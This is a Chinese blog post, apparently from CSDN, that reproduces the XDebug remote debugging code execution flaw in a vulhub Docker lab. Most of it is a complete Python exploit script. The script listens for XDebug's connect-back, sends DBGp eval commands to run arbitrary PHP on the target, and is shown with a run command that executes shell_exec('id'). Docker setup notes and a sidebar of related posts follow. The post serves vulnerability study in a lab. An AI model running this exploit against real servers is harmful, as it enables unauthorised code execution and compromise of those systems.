XDebug 远程调试漏洞(代码执行)

最新推荐文章于 2024-04-19 12:02:48 发布
最新推荐文章于 2024-04-19 12:02:48 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 中间件漏洞复现 文章标签: xdebug 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824491
版权

声明

好好学习,天天向上

漏洞描述

XDebug是PHP的一个扩展,用于调试PHP代码。如果目标开启了远程调试模式,并设置remote_connect_back = 1:

xdebug.remote_connect_back = 1
xdebug.remote_enable = 1

这个配置下,我们访问http://target/index.php?XDEBUG_SESSION_START=phpstorm,目标服务器的XDebug将会连接访问者的IP(或X-Forwarded-For头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。

影响范围

复现过程

这里使用2.5.5版本

使用vulhub

/app/vulhub-master/php/xdebug-rce

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

上exp.py,内容如下

#!/usr/bin/env python3
import re
import sys
import time
import requests
import argparse
import socket
import base64
import binascii
from concurrent.futures import ThreadPoolExecutor


pool = ThreadPoolExecutor(1)
session = requests.session()
session.headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}

def recv_xml(sock):
    blocks = []
    data = b''
    while True:
        try:
            data = data + sock.recv(1024)
        except socket.error as e:
            break
        if not data:
            break

        while data:
            eop = data.find(b'\x00')
            if eop < 0:
                break
            blocks.append(data[:eop])
            data = data[eop+1:]

        if len(blocks) >= 4:
            break
    
    return blocks[3]


def trigger(url):
    time.sleep(2)
    try:
        session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)
    except:
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')
    parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')
    parser.add_argument('-t', '--target', required=True, help='target url.')
    parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')
    args = parser.parse_args()
    
    ip_port = ('0.0.0.0', args.listen)
    sk = socket.socket()
    sk.settimeout(10)
    sk.bind(ip_port)
    sk.listen(5)

    pool.submit(trigger, args.target)
    conn, addr = sk.accept()
    conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))

    data = recv_xml(conn)
    print('[+] Recieve data: ' + data.decode())
    g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
    if not g:
        print('[-] No result...')
        sys.exit(0)

    data = g.group(1)

    try:
        print('[+] Result: ' + base64.b64decode(data).decode())
    except binascii.Error:
        print('[-] May be not string result...')

安装环境

# 要求用python3并安装requests库

直接执行,IP自行修改

python3 exp.py -t http://192.168.239.129:8080/index.php -c 'shell_exec('id');'

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
调试远程服务器xdebug,Xdebug远程调试服务器端配置
weixin_34975022的博客
07-30 329
第一步: 在服务器上安装PHP对应版本的Xdebug这个步骤很简单,先用phpinfo()函数看看本地的PHP版本信息,然后去Xdebug的官网下载对应版本的Xdebug,注意一定要区分32位系统和64位系统。第二步: 在php.ini文件中添加以下Xdebug的配置信息[PHP_Xdebug]zend_extension=/usr/lib64/php/modules/xdebug.soxdebu...
PHP远程调试XDEBUG
10-23
开发的时候我都是使用XDebug在本地调试,但是最近加入一些项目中去,环境太复杂了,要在本地搭建一个开发环境真的太麻烦了,那么我们怎么使用xdebug来远程调试呢?下面通过本篇文章给大家介绍php xdebug远程调试方法,感兴趣的朋友一起看看吧
lavavel “message“: “Xdebug has detected a possible infinite loop, and aborted your...
最新发布
qq_57866091的博客
04-19 255
是因为服务类互相依赖的问题,比如UserSerive服务类、GoodsService服务类,UserSerive服务类注入GoodsService服务类,反过来,GoodsService服务类注入UserSerive服务类。互相依赖,考虑重构这些服务来移除直接的依赖。例如,如果一个服务只是偶尔需要另一个服务,可以考虑使用服务定位器模式或在方法内部通过。中是否互相使用了对方。特别是检查这些服务的构造函数和方法,看是否在尝试获取或注入对方的实例。助手函数延迟加载服务,而不是在构造函数中注入。
XDebug 远程调试漏洞复现(代码执行
whojoe的博客
06-30 1935
XDebug 远程调试漏洞复现(代码执行)前言环境搭建 前言 因为自己在调试php的时候就是使用的xdebug,不过没有开启xdebug.remote_connect_back = 1,这个是给远程调试使用,可以使用任意主机进行调试,如果不配置的话仅通过指定ip才可以调试,比较安全 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
XDebug 远程调试漏洞 代码执行 漏洞复现
ADummy的博客
02-26 604
XDebug 远程调试漏洞代码执行) by ADummy 0x00利用路线 ​ 构造XXE payload—>POST发送—>有回显(也有blind xxe 参考资料) 0x01漏洞介绍 ​ XDebug是PHP的一个扩展,用于调试PHP代码。如果目标开启了远程调试模式,并设置remote_connect_back = 1: xdebug.remote_connect_back = 1 xdebug.remote_enable = 1 这个配置下,我们访问http://target/
php7.4+phpstorm2022+宝塔linux xdebug远程调试教程
05-15
老弟最新调试成功的,php7.4+phpstorm2022+xdebug远程调试教程。 网络太多这种教程了,基本都过时了,有的...按照下来,基本不通过,调试不了,经过老弟一条的摸索,各种百度,总结出了一份可行的xdebug远程调试方案。
解析phpstorm + xdebug 远程断点调试
10-27
本篇文章是对phpstorm + xdebug 远程断点调试进行了详细的分析介绍,需要的朋友参考下
使用phpstorm和xdebug实现远程调试的方法
12-19
1.原理:xdebug是一款php调试插件,支持远程调试,就是在php文件运行的时候,能通过tcp协议,来发送调试信息到远程端口,ide在收到调试信息的时候,可以向xdebug发送单步运行,中止运行,运行等命令。这样就实现了vs...
远程调试XDebug
Mr_Rongyao的博客
08-26 274
我这里之前已经装了。
xdebug远程调试
许发君博客
01-02 963
安装xdebug 见我另外一篇文章:PHP安装xdebug 配置项 xdebug.remote_enable = 1 ; 开启远程调试,必须设置为1 xdebug.idekey = PHPSTORM ; 可选设置, xdebug.remote_connect_back = 1 ; 如果PHPStorm在本地,请设置为1,不然本地检测不到 设置phpstorm相关配置...
Xdebug结合IDE远程调试
NULL码农
05-18 806
1.安装Xdebug 这里有各个操作系统的安装说明 我以win7为例: 在这个页面文本框内输入phpinfo()内容 Xdebug会为你的开发环境提供最好的建议来安装 2.php.ini设置 [xdebug] ;你下载的dll路径 zend_extension =&amp;amp;quot;F:/php/php7.0.10/zend_ext/php_xdebug-2.4.1-7.0-vc14-x86_6...
【安全要闻】PHP多个远程代码执行漏洞风险预警
qzt961003的博客
06-16 453
5月16日,PHP官方收到了一份报告,报告中提出关于PHP8.1.6版本,存在远程代码执行漏洞。经PHP官方确认,于6月9日,PHP官网发布了该漏洞的修复方案。
HITCON 2018 BabyCake WriteUp && XDebug + VSCode远程调试
heySister
11-22 1055
哦,终于把这道题目搞定了,写一下我的复现过程,主要是配了一下Xdebug的环境,因为手抖耽误了很多时间。 先贴一下docker: docker pull gaoxijiejie/babycake 下载好之后运行指令为: docker run -id --name cake-xdebug -p 8080:80 -p 9009:9009 cake-xdebug /bin/bash (xdebug使用的...
配置xdebug远程调试-xdebug安装
weixin_36809327的博客
07-24 600
本人在windows下开发,运行环境在虚拟机上,centos6.5+nginx1.1和php5.6.3! 首先安装xdebug 1获取你的phpinfo信息, 2将phpinfo输出信息全部复制到http://www.xdebug.org/wizard.php,   3xdebug会自动判断你需要的版本 4获取下载链接下载,安装开始 1. wget http://xd
网路安全之远程代码执行漏洞
qq_52074678的博客
05-11 3139
一。什么是远程代码执行? 远程代码执行:Remote Code Execute 后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞,不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法 远程命令执行:Remote Command Execute 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对
宝塔 开启xdebug_如何配置sublime xdebug断点
weixin_39939303的博客
01-16 144
第一步:安装php xdebug扩展(本人使用宝塔安装,一键搞定)讲的很详细,这里略过。第二步:安装sublime xdebugclient(不是xdebug)直接用package control安装即可第三步:配置php xdebug扩展windows:Xml代码[XDebug]zend_extension="D:\xampp\php\ext\php_xdebug.dll"xdebug....
CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
Love&Share
10-03 3050
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞 提示:似曾相识,就这一个文件,不用扫描 注释中只有一个<!-- cve-->用burp抓包发现响应行中的X-Powered-By字段很可疑 谷歌之后发现该PHP版本存在漏洞:PHP 远程代码执行漏洞(CVE-2019-11043 漏洞原理 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码 向Nginx + PHP-FP
xdebug stack
11-04
xdebug stack是指xdebug扩展提供的一个功能,可以用于调试PHP应用程序时查看当前代码执行的堆栈信息。堆栈信息包括当前执行的函数、文件名、行号等信息,可以帮助开发者快速定位代码中的问题。 使用xdebug stack功能需要在php.ini文件中启用xdebug扩展,并设置xdebug.auto_trace和xdebug.collect_params参数为1。然后在代码中使用xdebug_start_trace()函数开始跟踪,执行代码后使用xdebug_stop_trace()函数停止跟踪。跟踪结果会保存在指定的文件中,可以使用xdebug_parse_trace()函数解析并查看堆栈信息。 除了xdebug stack,xdebug还提供了其他一些有用的调试功能,例如远程调试、性能分析等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值